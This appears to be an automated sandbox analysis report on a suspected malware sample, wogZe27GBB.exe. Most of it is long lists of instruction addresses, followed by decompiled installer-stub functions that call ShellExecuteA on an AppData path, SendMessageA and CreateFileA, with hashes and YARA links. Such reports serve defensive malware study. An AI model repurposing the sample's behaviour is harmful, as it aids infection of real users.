                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x0040681f
                                                                                                        0x00406819
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00406819
                                                                                                        0x004067a0
                                                                                                        0x0040679d

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                        • Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
                                                                                                        • Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                        • Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401DC1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00401DC1() {
				char* _t6;
				void* _t16;
				void* _t19;
				void* _t26;

				_t24 = E004029F6(_t19);
				_t6 = E004029F6(0x31);
				_t22 = E004029F6(0x22);
				E004029F6(0x15);
				E00401423(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t16 = ShellExecuteA( *(_t26 - 0x34),  ~( *_t5) & _t24, _t6,  ~( *_t7) & _t22, "C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons",  *(_t26 - 0x18)); // executed
				if(_t16 < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}







                                                                                                        0x00401dc9
                                                                                                        0x00401dcb
                                                                                                        0x00401ddb
                                                                                                        0x00401ddd
                                                                                                        0x00401de4
                                                                                                        0x00401df0
                                                                                                        0x00401dfe
                                                                                                        0x00401e07
                                                                                                        0x00401e10
                                                                                                        0x0040265c
                                                                                                        0x0040265c
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\ViberPC\Icons,?), ref: 00401E07
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Roaming\ViberPC\Icons, xrefs: 00401DF2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ExecuteShell
                                                                                                        • String ID: C:\Users\user\AppData\Roaming\ViberPC\Icons
                                                                                                        • API String ID: 587946157-3850056743
                                                                                                        • Opcode ID: 7f9428e02b8fb4388b1cdde539cce81515ded46ead36c0b4657541fb92161dc4
                                                                                                        • Instruction ID: e70fe2a762fbf0658a98981193bf00505e6ec524d5fd87abb86dead059a1e580
                                                                                                        • Opcode Fuzzy Hash: 7f9428e02b8fb4388b1cdde539cce81515ded46ead36c0b4657541fb92161dc4
                                                                                                        • Instruction Fuzzy Hash: 7BF0C872B04201AAC751AFB59D4AA5E26A8AB41398F200637F510F61C1D9BD8841A658
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 69%
                                                                                                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}











                                                                                                        0x0040138a
                                                                                                        0x004013fa
                                                                                                        0x0040139b
                                                                                                        0x004013a0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004013a2
                                                                                                        0x004013a3
                                                                                                        0x004013ad
                                                                                                        0x00000000
                                                                                                        0x00401404
                                                                                                        0x004013b0
                                                                                                        0x004013b7
                                                                                                        0x004013bd
                                                                                                        0x004013be
                                                                                                        0x004013c0
                                                                                                        0x004013c2
                                                                                                        0x004013b9
                                                                                                        0x004013b9
                                                                                                        0x004013ba
                                                                                                        0x004013ba
                                                                                                        0x004013c9
                                                                                                        0x004013cb
                                                                                                        0x004013f4
                                                                                                        0x004013f4
                                                                                                        0x004013c9
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                        • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                                                                                                        • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                        • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040583D, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E0040583D(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                        0x00405841
                                                                                                        0x0040584e
                                                                                                        0x00405863
                                                                                                        0x00405869

                                                                                                        APIs
                                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\wogZe27GBB.exe,80000000,00000003), ref: 00405841
                                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                        Memory Dump Source
